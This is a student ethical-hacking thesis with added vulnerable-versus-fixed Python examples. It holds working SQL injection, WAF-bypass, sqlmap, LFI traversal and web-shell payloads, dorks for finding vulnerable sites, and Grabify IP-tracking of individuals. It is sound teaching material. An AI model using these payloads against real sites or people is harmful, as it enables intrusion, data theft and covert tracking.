
Cyber Security and Ethical Hacking Thesis1

The thesis by Md Mahedi Hasan focuses on cybersecurity and ethical hacking, detailing techniques for identifying and mitigating vulnerabilities in modern systems. It covers various topics such as SQL injection, OSINT tracking, penetration testing, and tools like Kali Linux and SQLMap, while also discussing freelancing opportunities in the field. The work aims to serve as a comprehensive guide for cybersecurity professionals to enhance their skills and contribute to a safer digital environment.

Uploaded by rajibhasanbadon

Cyber Security and Ethical Hacking

A thesis submitted in partial fulfillment of the requirements for the course
of Cyber Security and Ethical Hacking

By Md Mahedi Hasan
On March 24

Arena Web Security

Submitted by
User ID: mahedihasanprodan00
Email: [email protected]
Date of Submission: 24/03/2025

Declaration by student

I, Md Mahedi Hasan, currently a 3rd year student of the Department of Social
Work studying at Ananda Mohan College, Mymensingh, hereby declare that
the work presented herein is original work done by me under the
supervision of Fahim Al Tanjim and has not been published or submitted
elsewhere for the requirement of a degree program. Any literature, data or
work done by others and cited within this thesis has been given due
acknowledgement and is listed in the reference section.

Md Mahedi Hasan
Place: Arena Web Security
Date: 22/3/2025
Certificate

Certified that the thesis entitled “Cyber Security & Ethical Hacking”
submitted by Md Mahedi Hasan towards partial fulfillment of the course
of Cyber Security and Ethical Hacking run by the institution Arena Web
Security is based on the investigation and learning done so far from the
beginning of the course, carried out under our guidance. The thesis has
therefore not been submitted for the academic award of any other university
or institution.

Countersigned                                  Signature
                                               Mahedi
………………………………..                                  …………………………………
(Tanjim Al Fahim)                              (Md Mahedi Hasan)
Supervisor                                     Batch: 53 (Delta)


Abstract

This thesis explores the multifaceted domain of cybersecurity and ethical
hacking, focusing on advanced techniques, tools, and methodologies used
to identify and mitigate vulnerabilities in modern systems. The study delves
into topics such as SQL injection, OSINT tracking, session hijacking,
advanced Local File Inclusion (LFI), web shells, Cross-Site Scripting (XSS),
Cross-Site Request Forgery (CSRF), and the use of tools like Kali Linux,
Burp Suite, Nmap, and Nessus. Additionally, it covers practical aspects
such as web application reconnaissance, vulnerability assessment,
penetration testing, and report writing. The thesis also examines
freelancing opportunities in cybersecurity, such as WordPress malware
removal, and provides insights into bug bounty programs and social
engineering. The goal is to provide a comprehensive guide for
cybersecurity professionals and ethical hackers to enhance their skills and
contribute to a safer digital ecosystem.
Acknowledgement

I would like to express my sincere gratitude to our honourable course
instructor and supervisor Tanjim Al Fahim Sir, Admin Md Ashif Islam, Bijoy
Chandra Mondal, Syed Sakib Alam Mubin and all the moderators and admins
for their continuous advice, effort and invaluable suggestions throughout the
research. I am really grateful to them. I would also like to thank all my
course mates on this course who advised, helped and made suggestions to me
whenever I got stuck at some point during the entire course.

Thank you.

Table Of Contents

                                                                 Page No
1. Basic SQL Injection ................................................ 7
2. SQL Injection by Tools (Havij) .................................... 10
3. Manual SQL Injection .............................................. 12
4. SQLi WAF Bypass ................................................... 15
5. SQLMap ............................................................ 16
6. Tracking Someone Online (OSINT) ................................... 19
7. Session Hijacking/Blocking ........................................ 23
8. Basic to Advanced LFI ............................................. 25
9. Cross Site Scripting (XSS) ........................................ 27
10. Acunetix Web Application Security Scanner ........................ 28
11. Kali Linux Install, Basics and Environment ....................... 31
12. PC and Phone Hacked .............................................. 35
13. Networking and Nmap .............................................. 38
14. Recon for Web Applications ....................................... 42
15. VAPT by Nuclei, Nikto and Nessus ................................. 46
16. Freelancing with WordPress ....................................... 48
17. Conclusion ....................................................... 50
Basic to Advanced SQL Injection (Classes 01, 02, 04, 07, 28)

Class 01: Basic SQL Injection

Basic SQL Injection
SQL injection is a code injection technique that, in the worst case, is enough
to destroy the database behind a website. It is one of the most common web
hacking techniques.
SQL injection usually occurs when we ask a user for input, such as their
username or password, and instead of a name or ID the user supplies a
fragment of SQL that the application unknowingly runs against its database.
Before we go into how basic SQL injection occurs, we first have to know what
a vulnerability in a website means.
Web vulnerability: A website vulnerability is a weakness in a website or in
web application code that allows an attacker to gain some level of control
over the site, and possibly the hosting server. Whether the weakness is rated
low or high severity, its presence gives attackers an opening to attack that
website.
To find websites that have this kind of vulnerability we take the help of
Google dorks. So what is a Google dork?
Google dork: Google dorking is a search technique that uses Google Search
and other Google applications to find security holes in the configuration
and code that websites use. A dork such as inurl:index.php?id= lists pages
whose URL carries a parameter that is handed to the database, which is where
injection is most often found.
By using Google dorks we can find websites that may contain such
vulnerabilities; for this we first search Google using one of the dorks.
Here is a list of some Google dorks:
Google dorks compilation to find SQL injections:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:view_product.php?id=

There are different ways to attack and get access to a website; in this part
we have learned about basic SQL injection against a login form.
User: 1' or '1'='1
Pass: 1' or '1'='1
We enter the above username and password to get access to the website.
So how does it work?
Every website has a database. If we put in a wrong username and password,
the login query finds no matching row and the site immediately rejects us.
But if we put the above value in both the username and password fields, the
quote closes the string the application was building and the login query
becomes WHERE username='1' or '1'='1' AND password='1' or '1'='1'. The
condition '1'='1' is always true, so the database evaluates the whole
condition as true, returns a row, and the application gives the attacker
unauthorized access.
The website cannot tell the injected condition from a legitimate one, and
the hacker easily gets access with the 1=1 query.
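A worked example of the login bypass described above, added here as an illustration rather than taken from the thesis. The users table, the stored credentials and the in-memory SQLite database are constructed for the example; the two login functions stand in for a real site's login handler. It shows the same 1' or '1'='1 value succeeding against a query built by string concatenation and failing against a parameterised query, which is the fix.

```python
import sqlite3


def make_db():
    """Constructed sample: an in-memory user table standing in for a site's database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'S3cr3t!')")
    return con


def login_vulnerable(con, username, password):
    # The query text is assembled by string formatting, so whatever the user
    # types becomes part of the SQL statement itself.
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    return con.execute(sql).fetchone() is not None


def login_safe(con, username, password):
    # Parameterised query: the driver sends the values separately from the
    # SQL text, so a quote in the input can never change the query structure.
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone() is not None


# The payload from the class, normalised: closes the quote, adds an always-true
# condition, and the rest of the original query is swallowed by the quoting.
PAYLOAD = "1' or '1'='1"


def demo():
    """Run both handlers against valid, wrong and injected credentials."""
    con = make_db()
    return {
        "valid_creds_vuln": login_vulnerable(con, "admin", "S3cr3t!"),
        "wrong_creds_vuln": login_vulnerable(con, "admin", "wrong"),
        "payload_vuln": login_vulnerable(con, PAYLOAD, PAYLOAD),
        "payload_safe": login_safe(con, PAYLOAD, PAYLOAD),
        "valid_creds_safe": login_safe(con, "admin", "S3cr3t!"),
    }


if __name__ == "__main__":
    for name, granted in demo().items():
        print(f"{name}: {'access granted' if granted else 'denied'}")
```

With the payload in both fields the vulnerable handler runs WHERE username='1' or '1'='1' AND password='1' or '1'='1'; because AND binds tighter than OR, the trailing or '1'='1' makes the whole condition true and a row comes back. The parameterised handler compares the literal string 1' or '1'='1 against stored usernames and finds nothing.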

Class 02: SQL Injection by Tools (Havij)

Havij

Havij is a tool that automates the extraction of information from the
database behind a vulnerable page. For example, if we choose the username
and password columns it will pull them from a website that has an injectable
parameter.
We use the same Google dorks as in basic SQL injection to find targets for
Havij. It is another method of getting access to a website, but in this case
we use a piece of software to obtain the username and password of the site we
have targeted for unauthorized access. So at the very beginning we need to
find candidate websites with a Google dork.
We should only run it against a website that actually has the vulnerability,
and that we are authorized to test.
To work with Havij we have to keep in mind that if the URL of the website
starts with https:// we must remove the "s" and put only http:// in the
target box.


Class 04: Manual SQL Injection

Manual SQL Injection

Every website has a database in which it stores all of its information on the
server. In every database the main information is stored in tables, as
columns and rows. So first of all we find out how many columns the vulnerable
query selects, by using ORDER BY and increasing the number until the page
errors:
9 ORDER BY 1--      (INT: the id is a bare number, e.g. php?id=9)
9' ORDER BY 1--+    (STRING: the id is quoted; 9 is the id value and 1 is the
                    column position being tested)
Then we check which of those columns are reflected on the page with a UNION
SELECT that has the same number of columns:
9 UNION SELECT 1,2,3,4,5,6,7,8,9--      (INT)
9' UNION SELECT 1,2,3,4,5,6,7,8,9--+    (STRING)
The markers are numbered 1-9 in sequence. We may have to make the original
row disappear so that the UNION row is the one displayed, by using a negative
or dotted id, like id=-9 or id=.9.
After this step we know which column number is displayed on the page, and we
use that column to pull data out of the database.
These steps are followed for the attack:
Union based -> DIOS for MySQL -> DIOS with WAF bypass (if one does not work,
try another one)
(DIOS, "dump in one shot", is a single payload that lists every table and
column at once; copy the DIOS payload and execute it in a new tab.)
Then get the data from those columns:
9 UNION SELECT 1,2,3,4,5,6,7,8,group_concat(column_name) FROM table_name--     (INT)
9' UNION SELECT 1,2,3,4,5,6,7,8,group_concat(column_name) FROM table_name--+   (STRING)

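The three manual steps above (count the columns with ORDER BY, find the displayed column with UNION SELECT, then pull a table through group_concat) carried out in code, as an added example that is not from the thesis. The product page, its tables and the admin_user credentials are constructed in an in-memory SQLite database; the integer-context payloads are the same shape as the INT variants in the class, with id=-9 used to suppress the real row.

```python
import sqlite3


def make_db():
    """Constructed sample: a product table behind the page, and the table we want."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER, name TEXT, category TEXT)")
    con.executemany("INSERT INTO products VALUES (?,?,?)",
                    [(9, "Keyboard", "input"), (10, "Mouse", "input")])
    con.execute("CREATE TABLE admin_user (username TEXT, password TEXT)")
    con.execute("INSERT INTO admin_user VALUES ('admin', 'hunter2')")
    return con


def product_page(con, id_param):
    """Vulnerable endpoint, like product.php?id=<id_param> with the value
    concatenated into the query in an integer context (no quotes)."""
    sql = f"SELECT id, name, category FROM products WHERE id={id_param}"
    return con.execute(sql).fetchall()


def find_column_count(page, max_cols=20):
    """Step 1: ORDER BY n succeeds while n <= number of selected columns and
    raises an error once n is too large, so the last good n is the count."""
    for n in range(1, max_cols + 1):
        try:
            page(f"9 ORDER BY {n}--")
        except sqlite3.OperationalError:
            return n - 1
    return None


def find_visible_columns(page, ncols):
    """Step 2: id=-9 matches nothing, so the UNION row is what gets rendered;
    the marker numbers that come back are the columns the page displays."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    rows = page(f"-9 UNION SELECT {markers}--")
    return [str(v) for v in rows[0]] if rows else []


def dump_table(page, ncols, column_expr, table, visible_pos=1):
    """Step 3: put group_concat() of the wanted data into a displayed column so
    a whole table arrives in one row."""
    cols = ["1"] * ncols
    cols[min(visible_pos, ncols - 1)] = f"group_concat({column_expr}, ';')"
    payload = f"-9 UNION SELECT {','.join(cols)} FROM {table}--"
    rows = page(payload)
    return rows[0][min(visible_pos, ncols - 1)] if rows else None


def demo():
    """Run the whole chain against the constructed page."""
    con = make_db()
    page = lambda p: product_page(con, p)
    ncols = find_column_count(page)
    visible = find_visible_columns(page, ncols)
    data = dump_table(page, ncols, "username || ':' || password", "admin_user")
    return {"columns": ncols, "visible": visible, "dump": data}


if __name__ == "__main__":
    print(demo())
```

On MySQL the same chain works with group_concat(username,0x3a,password) and the version-specific DIOS payloads; the fix on the server side is the same as for the login form, a parameterised query, plus a database account that cannot read tables the page has no business touching.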
Class 07: SQLi WAF Bypass

SQLi WAF Bypass

WAF = Web Application Firewall
A Web Application Firewall (WAF) filters and blocks malicious SQL injection
payloads by matching them against known patterns. Manual bypass techniques
exploit weaknesses in WAF rule design, such as:
* Altering payloads so they no longer match the predefined threat signatures.
* Exploiting inconsistencies between how the WAF and the backend parse inputs.
* Leveraging SQL dialect features or application logic to execute the query
  undetected.

Examples:

uNiOn sEleCt 1,2,3--+
(mixed case defeats a case-sensitive signature)

%27%20UNION%20SELECT%20 1,2,3--+
(URL-encoded quote and spaces, which a WAF that does not decode the input
before matching will not recognise)

'/*!50000UNION*//*!50000SELECT*/
1,2,CONCAT(username,0x3d3d,password),4 FROM admin_user-- +
(MySQL version comments: MySQL executes the text inside /*!50000 ... */,
while a signature looking for UNION SELECT separated by whitespace sees only
comments)

Manual WAF bypass techniques highlight the limitations of signature-based
security systems. By exploiting gaps in input parsing, encoding
normalization, and SQL dialect nuances, attackers can circumvent even
robust WAFs. This underscores the need for defense in depth: a WAF combined
with parameterised queries and secure coding practices, and runtime
monitoring, rather than a WAF on its own.

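Why the three payloads above slip past a naive signature, and what a rule has to do before matching, shown in code. This is an added example and not from the thesis or any real WAF product; the two rules are written for this illustration and the payload list is the one from the class plus a plain variant. The naive rule matches the literal text; the second one URL-decodes, strips ordinary and MySQL version comments, collapses whitespace and case-folds first.

```python
import re
from urllib.parse import unquote

# Constructed payload set: the class's three bypasses plus the plain form.
PAYLOADS = {
    "plain": "' UNION SELECT 1,2,3--+",
    "mixed_case": "uNiOn sEleCt 1,2,3--+",
    "url_encoded": "%27%20UNION%20SELECT%20 1,2,3--+",
    "version_comment": ("'/*!50000UNION*//*!50000SELECT*/ "
                        "1,2,CONCAT(username,0x3d3d,password),4 FROM admin_user-- +"),
}

# A weak, case-sensitive signature of the kind the bypasses are aimed at.
NAIVE_RULE = re.compile(r"UNION\s+SELECT")


def naive_waf_blocks(payload):
    """Match the raw request text as received."""
    return NAIVE_RULE.search(payload) is not None


def normalize(payload):
    """Undo the evasion tricks before matching."""
    s = unquote(unquote(payload))                 # decode, twice for double encoding
    s = re.sub(r"/\*(?!!).*?\*/", " ", s)         # /* ordinary comment */ -> space
    s = re.sub(r"/\*!\d*", " ", s)                # /*!50000UNION*/ -> UNION*/
    s = s.replace("*/", " ")                      # drop the comment closers
    s = re.sub(r"\s+", " ", s)                    # collapse whitespace
    return s.lower()                              # case-fold


NORMALIZED_RULE = re.compile(r"\bunion\b.*\bselect\b")


def normalizing_waf_blocks(payload):
    """Match after normalization; same rule, but applied to what MySQL will see."""
    return NORMALIZED_RULE.search(normalize(payload)) is not None


def compare():
    """For each payload: (blocked by naive rule, blocked by normalizing rule)."""
    return {name: (naive_waf_blocks(p), normalizing_waf_blocks(p))
            for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for name, (naive, normalized) in compare().items():
        print(f"{name:16s} naive={naive!s:5s} normalized={normalized}")
```

The normalizing rule catches all four, but it only covers the tricks listed on this page; the wider point of the class stands, because the decode-and-strip step has to reproduce exactly what the backend parser does, and any difference between the two is a new bypass. That is why the WAF is a layer and the parameterised query is the fix.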

Class 28: SQLMap

SQLMap
SQLMap is an open-source penetration testing tool that automates the
detection and exploitation of SQL injection vulnerabilities. It supports a
wide range of databases (e.g. MySQL, PostgreSQL, MSSQL) and injection
techniques (union-based, boolean-based blind, time-based blind, error-based
and stacked queries). Unlike manual methods, SQLMap streamlines the process
of fingerprinting the database, dumping data, and evading security
mechanisms like Web Application Firewalls (WAFs).

SQLMap Workflow: Step by Step

Step 1: Identify a Vulnerable Parameter

URL: https://exa.com/
Command: sqlmap -u https://exa.com/ --crawl=2
To accept the default answer to every prompt: sqlmap -u https://exa.com/ --crawl=2 --batch
To view the crawl results written to disk: cat <file/URL location>

Step 2: Enumerate Databases

Command: sqlmap -u https://exa.com/pro?id=1 --dbs --batch

Step 3: Extract Tables from a Database

Command: sqlmap -u https://exa.com/pro?id=1 -D name --tables --batch

Step 4: List the Columns of a Table

Command: sqlmap -u https://exa.com/pro?id=1 -D name -T user --columns --batch

Step 5: Dump Column Data

Command: sqlmap -u https://exa.com/pro?id=1 -D name -T user -C name --dump --batch

Results are written under: /root/.local/share/sqlmap/output/<site url>

To show a result: cat <filename>

For faster work we can raise the number of concurrent requests (sqlmap accepts
a single value from 1 to 10): sqlmap -u <url> --dbs --threads=4 --batch

SQLMap streamlines SQL injection testing by automating payload generation,
database fingerprinting, and data exfiltration. Its flexibility in bypassing
WAFs (through tamper scripts) and executing OS commands highlights the
importance of securing applications against automated exploitation tools.
Ethical hackers leverage SQLMap to identify vulnerabilities, but its power
also underscores the need for robust defenses like input validation,
parameterised queries and least-privilege database access.
Class 3: Tracking Someone Online (OSINT)

OSINT
The term OSINT stands for open source intelligence.
Open-source intelligence (OSINT) is data collected from publicly available
sources to be used in an intelligence context. In the intelligence
community, the term "open" refers to overt, publicly available sources (as
opposed to covert or clandestine sources).
OSINT is also about learning to use OSINT tools to better understand our own
digital footprint.

Example:
Google reverse image search: We can use Google's search by image to get
information about a picture just by uploading it, as in the picture shown
below. It is not guaranteed that we will get every piece of information from
a Google image search; we may have to go through other techniques to find
information from a picture.
OSINT for websites:
For more information about a domain, such as who owns it, when they
registered it, when it expires, and much more, we can use the following:
For website info: whois.domaintools.com
For a .bd site: the BTCL BDIA domain search
For website history: the Wayback Machine, with whose help we can see what
has changed in the website from the past to the present.

OSINT for humans:

Example: context = a man's or woman's name
<context> site:facebook.com (or linkedin.com, x.com, etc.)

*Grabify:
This tool generates a tracking link; when the target opens it, the service
records information about the visitor such as their IP address and
approximate location (country, city), and so on. The full list of features
can be viewed on the Grabify site.
Class 5: Session Hijacking/Blocking

NoRedirect
Before we go into the NoRedirect topic we have to know about cookies and
sessions.

Cookies and sessions are both used to store information. Cookies are stored
only on the client machine, while a session is stored on the server and
referenced from the client by a session ID, which is usually carried in a
cookie. A session creates a file in a temporary directory on the server
where the registered session variables and their values are stored.

NoRedirect is a Firefox/SeaMonkey extension that lets the user take control
of HTTP redirects. It can be used to intercept an ISP's DNS search
redirection hijacks, preview or screen "shortened" URLs, stop the annoying
redirection of "smart" error pages, and so on. HTTP stands for "Hypertext
Transfer Protocol"; it is the protocol used to transfer data over the web,
is part of the Internet protocol suite, and defines the commands and services
used for transmitting web page data. HTTP uses a client-server model.
Generally, with the help of the NoRedirect add-on we block the redirect to
the login page; afterwards we can go directly to the admin page, because the
jump to the login page has been blocked and whatever the server sent along
with the redirect is displayed instead. Blocking the login redirect alone does
not mean we can enter the dashboard. If we cannot enter the dashboard even
after blocking the redirect, then we have to find the other pages of that
admin area. To find them we take help from a tool: while using it we remove
the part of the URL after admin and place the remainder in the tool's search
bar. If a page is reachable, the tool shows a green "found" next to the URL,
meaning we can try that URL to reach the admin dashboard. Even that does not
assure us that every URL marked "found" will get us into the dashboard.

This method will not work everywhere; we have to try different techniques to
get access to a website.

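What blocking the redirect actually exploits, as an added example that is not from the thesis. The typical cause is a server-side script that sends the redirect to the login page but keeps running and still returns the protected page in the response body (in PHP, a header('Location: ...') with no exit after it); a browser follows the 302 and never shows the body, while NoRedirect lets the user see it. The two handlers below are written for this illustration with a made-up session value; the fixed version returns nothing but the redirect to an unauthenticated visitor.

```python
# Constructed stand-in for a valid server-side session (not a real session ID).
SESSION_ADMIN = "logged-in"


def admin_page_vulnerable(session):
    """Emits a redirect for anonymous visitors but still renders the dashboard
    into the body, the flaw NoRedirect-style bypasses depend on."""
    headers, status = {}, 200
    if session != SESSION_ADMIN:
        status = 302
        headers["Location"] = "/login.php"
        # missing: stop here (PHP: exit;) so nothing below executes
    body = "<h1>Admin dashboard</h1><p>secret settings</p>"
    return status, headers, body


def admin_page_fixed(session):
    """Authorisation decided before any rendering: an anonymous request gets the
    redirect and an empty body, so suppressing the redirect reveals nothing."""
    if session != SESSION_ADMIN:
        return 302, {"Location": "/login.php"}, ""
    return 200, {}, "<h1>Admin dashboard</h1><p>secret settings</p>"


def what_noredirect_sees(handler):
    """Simulate a client that ignores Location headers and renders whatever body
    arrived, which is what the add-on lets a user do."""
    status, headers, body = handler(session=None)
    return {
        "status": status,
        "redirected_to": headers.get("Location"),
        "leaked": "Admin dashboard" in body,
    }


if __name__ == "__main__":
    print("vulnerable:", what_noredirect_sees(admin_page_vulnerable))
    print("fixed:     ", what_noredirect_sees(admin_page_fixed))
```

Both handlers send the same 302 to /login.php, so the pages look identical in a normal browser; only the body differs, which is why an audit of "redirect to login" pages should read the raw response rather than trust what the browser shows.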
Basic to Advanced LFI: Classes 06, 11

Class 06: LFI

LFI Basics
LFI = Local File Inclusion
What is LFI?
A vulnerability where an application dynamically includes local files without
proper validation, allowing attackers to read sensitive files and, in some
setups, to execute code.

?page=about.php → ?page=../../../etc/passwd
../../../../../../../../../etc/passwd (Linux)
or
../../../../../../../../.././../../../windows\win.ini (Windows)

Traversal:
?file=../../../../etc/passwd
?page=..%2F..%2F..%2Fetc%2Fpasswd

Null Byte:
?file=../../../etc/passwd%00
(The NUL byte terminates the string in PHP versions before 5.3.4, so a suffix
the application appends, such as .php, is ignored.)

LFI to RCE (Remote Code Execution)

The /proc/self/environ file contains the environment variables of the current
process. If the application includes this file via LFI, you can inject PHP
code into an environment variable (HTTP_USER_AGENT) and trigger code
execution.
1. Identify the LFI vulnerability
?file=../../../../proc/self/environ
2. Poison an environment variable
GET /vulnerable.php?file=../../../../proc/self/environ HTTP/1.1
Host: target.com
User-Agent: <?php system($_GET['cmd']); ?>    # malicious PHP code
3. Trigger RCE via the LFI
?file=../../../../proc/self/environ&cmd=id
(This only works when the PHP process is the one whose environment carries
the request headers, as with mod_php or CGI rather than PHP-FPM, and when
/proc/self/environ is readable by the web server user.)

Dorking for LFI

inurl:"index.php?page="
filetype:php inurl:"?file="
intitle:"index of" etc/passwd
inurl:".php?file=" site:com
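The traversal, URL-encoded and null-byte payloads above run against a vulnerable include and a hardened one, as an added example that is not from the thesis. The web root, the two legitimate pages and a stand-in for /etc/passwd are created in a temporary directory so the example runs anywhere; the hardened version uses an allow-list of page names plus a realpath check that the resolved file stays under the web root, and rejects NUL bytes before touching the filesystem.

```python
import os
import shutil
import tempfile
from urllib.parse import unquote


def build_fixture():
    """Constructed layout: <base>/www/pages holds the site's pages, and
    <base>/passwd plays the role of /etc/passwd two levels up."""
    base = tempfile.mkdtemp()
    webroot = os.path.join(base, "www", "pages")
    os.makedirs(webroot)
    for name, body in (("about.php", "<h1>About</h1>"),
                       ("contact.php", "<h1>Contact</h1>")):
        with open(os.path.join(webroot, name), "w") as f:
            f.write(body)
    with open(os.path.join(base, "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")
    return base, webroot


def include_vulnerable(webroot, page):
    """Like include($_GET['page']) relative to the pages directory:
    the parameter is decoded and joined with no validation at all."""
    path = os.path.join(webroot, unquote(page))
    with open(path) as f:
        return f.read()


ALLOWED_PAGES = {"about.php", "contact.php"}


def include_hardened(webroot, page):
    page = unquote(page)
    # 1. Refuse NUL bytes (the %00 truncation trick) before any filesystem call.
    if "\x00" in page:
        raise ValueError("NUL byte in page parameter")
    # 2. Allow-list: only known page names are accepted, so ../ never gets far.
    if page not in ALLOWED_PAGES:
        raise ValueError(f"page not allowed: {page!r}")
    # 3. Belt and braces: the resolved path must remain under the web root.
    root = os.path.realpath(webroot)
    path = os.path.realpath(os.path.join(root, page))
    if os.path.commonpath([root, path]) != root:
        raise ValueError("path escapes web root")
    with open(path) as f:
        return f.read()


def try_include(fn, webroot, page):
    """Return the included content, or a short marker when the include failed."""
    try:
        return fn(webroot, page)
    except (OSError, ValueError) as e:
        return f"blocked: {type(e).__name__}"


def demo():
    base, webroot = build_fixture()
    traversal = "../../passwd"             # pages -> www -> base/passwd
    encoded = "..%2F..%2Fpasswd"           # same path, URL-encoded slashes
    nul = "../../passwd%00.php"            # null-byte truncation attempt
    try:
        return {
            "vuln_about": try_include(include_vulnerable, webroot, "about.php"),
            "vuln_traversal": try_include(include_vulnerable, webroot, traversal),
            "vuln_encoded": try_include(include_vulnerable, webroot, encoded),
            "hard_about": try_include(include_hardened, webroot, "about.php"),
            "hard_traversal": try_include(include_hardened, webroot, traversal),
            "hard_encoded": try_include(include_hardened, webroot, encoded),
            "hard_nul": try_include(include_hardened, webroot, nul),
        }
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:15s} {v!r}")
```

The vulnerable include happily returns the passwd file for both the plain and the encoded traversal. The allow-list is what does the work in the hardened version; the realpath check is there so that a later change to the allow-list (say, letting users pick a template name) cannot quietly reopen the traversal.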
Class 12: Cross Site Scripting (XSS)

XSS

Cross-Site Scripting (XSS) is a security vulnerability in web applications
that allows attackers to inject malicious scripts into web pages viewed by
other users. These scripts execute in the victim's browser, enabling attacks
like data theft, session hijacking, or website defacement.

Types of XSS
1. Stored XSS: the payload is saved by the server (for example in a comment)
   and served to every visitor of the page.
2. Reflected XSS: the payload is echoed straight back from the request, for
   example from a search parameter, and reaches the victim through a link.
3. DOM-based XSS: client-side JavaScript writes attacker-controlled data into
   the page, so the server never sees the payload.
Class 14: Acunetix Web Application Security Scanner

Target Configuration

Add Target URL


Target Settings
Running the Scan
Reviewing Results
Kali Linux Install, Basics and Environment Setup: Classes 15, 16, 18

Class 15: Kali Linux Install

What is a Kernel?
The kernel is the core component of an OS, managing hardware resources
(CPU, memory, devices) and facilitating communication between software and
hardware.

To install Kali Linux on our computer we first need to turn on the
virtualization setting in the BIOS/UEFI. We install Kali inside virtual
machine software because that isolates it from the host OS, preventing
potential harm to the host during security testing.

We use Debian-based Kali for cybersecurity and ethical hacking because of
its:

Pre-installed tools (600+ tools)
Stability and customization
Community support
Install Kali Linux on VirtualBox (GUI Mode)

Download ISO: Get Kali's ISO from the official site and check its SHA256
checksum against the one published there before using it.

Create VM:
Open VirtualBox → New → Name: "Kali" → Type: Linux → Version: Debian (64-bit).
Allocate RAM (4GB+) and storage (20GB+).

Mount ISO:
Settings → Storage → Attach the ISO under "Optical Drive".

Install Kali:
Start VM → Select "Graphical Install" → Follow the prompts (language, hostname).
Partitioning: Use "Guided - Use Entire Disk".
User Setup: Set the root password and create a standard user.

Post-Install: Install VirtualBox Guest Additions for shared folders.

Basic Kali Linux Commands

Update :
sudo apt update && sudo apt upgrade
Common Commands:

ls: List files.

cd: Change directory.

nano: Text editor.

ip a: Show network interfaces.

mkdir: make directory.

Importance of Repositories

Repositories host signed, verified software packages. Kali's repos:

Ensure tools are vetted before they reach the distribution.

Simplify updates via apt.

Avoid manual downloads from untrusted sources (reducing malware risk).

File Sharing from Windows to Kali

On Windows: select the folder → Properties → Sharing → Share → select Everyone
with read and write permission → Share → Done
Advanced Sharing → tick "Share this folder" → Apply → OK

In VirtualBox:
Kali VM Settings → Shared Folders → + and select the folder.
Do not tick the Read-only box.
The folder appears in Kali Linux under home → Devices.
Then copy the file out and create a new folder with the file name.

Go Language Setup on Kali Linux:

Copy the download link of the Linux Go tarball → run wget <copied URL> →
unpack the archive so that /usr/local/go exists (the GOROOT below points
there).

Then also run these to set up the environment:

export GOPATH=$HOME/go
export GOROOT=/usr/local/go
export PATH=$PATH:$GOROOT/bin:$GOPATH/bin
Class 17: PC and Phone Hacked

1. What is a keylogger?
A keylogger is a surveillance tool (hardware or software) that records
keystrokes to capture sensitive data like passwords, credit card numbers,
and messages.
Example:
The Olympic Vision keylogger targeted diplomats and executives by
recording keystrokes and exfiltrating data via email.

2. What is a RAT?
RAT = Remote Access Trojan
A RAT is malware that grants attackers full remote control over a
compromised device.
How does it work?
Delivery: phishing emails, malicious downloads.
Drops payloads like njRAT or DarkComet.
Capabilities: screen recording, file theft, webcam activation, command
execution.

Example:
The Pegasus Spyware (NSO Group) exploited zero-day vulnerabilities to
4. What is malware?
Malware (malicious software) disrupts, damages, or gains unauthorized
access to systems.

Types:

Viruses: attach to clean files.
Worms: self-replicate via networks.
Trojans: disguised as legitimate software.
Ransomware: encrypts files for extortion.

Example:
NotPetya masqueraded as ransomware but was designed to destroy data,
causing an estimated $10 billion in damages globally.

5. What is antivirus?
Antivirus software detects, blocks, and removes malware.

How It Works:

Signature-based detection: matches files against a database of known
malware hashes and byte patterns.

Heuristic analysis: identifies suspicious behaviour or code structure.

Sandboxing: executes files in an isolated environment to observe behaviour.

Limitations:

Struggles with zero-day exploits.

Bypassed by polymorphic malware, which changes its own code so no two
samples share a signature.

Example:
Windows Defender uses cloud-based machine learning to flag unknown
threats.

6. Virus Distribution Systems:

Phishing campaigns: malicious attachments.
Drive-by downloads: exploit kits on compromised websites.
Social engineering: fake software updates.
Removable media: USB drops.
Example:
The Mirai botnet spread via default IoT device credentials, creating a DDoS
army.

Keyloggers, RATs, and malware represent the offensive toolkit of modern
hackers, while antivirus and behavioural analysis form the defensive front.
Understanding these mechanisms, and their evasion tactics, is critical for
developing robust cybersecurity strategies. As attackers innovate,
defenders must adopt proactive measures like AI-driven threat hunting and
zero-trust architectures to stay ahead.
Class 19: Networking and Nmap

Networking
1. What is a Network?
A network is a system of interconnected devices that communicate via
standardized protocols (TCP/IP) to share resources. Networks enable data
transfer, remote access, and services like email or web browsing.

Types of Networks:

LAN (Local Area Network).
MAN (Metropolitan Area Network).
WAN (Wide Area Network).

2. What is an IP Address?
An IP (Internet Protocol) address is a unique numerical identifier assigned
to a device on a network. It enables routing and communication between
devices.

Example:
192.168.1.1 (IPv4) or 2001:0db8:85a3::8a2e:0370:7334 (IPv6).

3. Addressing in Networks
Addressing ensures devices can locate and communicate with each other.
Two primary types:
Logical addressing (IP addresses): dynamic (DHCP) or static assignments.

Physical addressing (MAC addresses): burned into the network interface at
manufacture, although software can override the address in use.

4. TCP/UDP
TCP (Transmission Control Protocol):

Connection-oriented: establishes a three-way handshake (SYN > SYN-ACK > ACK).
Reliable: guarantees delivery via acknowledgments and retransmissions.
Used for HTTP, FTP, email.

UDP (User Datagram Protocol):

Connectionless: no handshake or error recovery.
Fast but unreliable: ideal for streaming, VoIP, gaming.

5. IPv4 vs. IPv6

IPv4:

32-bit address (about 4.3 billion unique addresses).
Exhausted due to internet growth.
Uses NAT (Network Address Translation) to conserve addresses.

IPv6:

128-bit address (about 340 undecillion addresses).
Hexadecimal format with colons (e.g. 2001:0db8:85a3::8a2e:0370:7334).
IPsec is part of the protocol suite (though its use is not mandatory) and
routing is simplified.

Nmap
6. Nmap: The Network Mapper
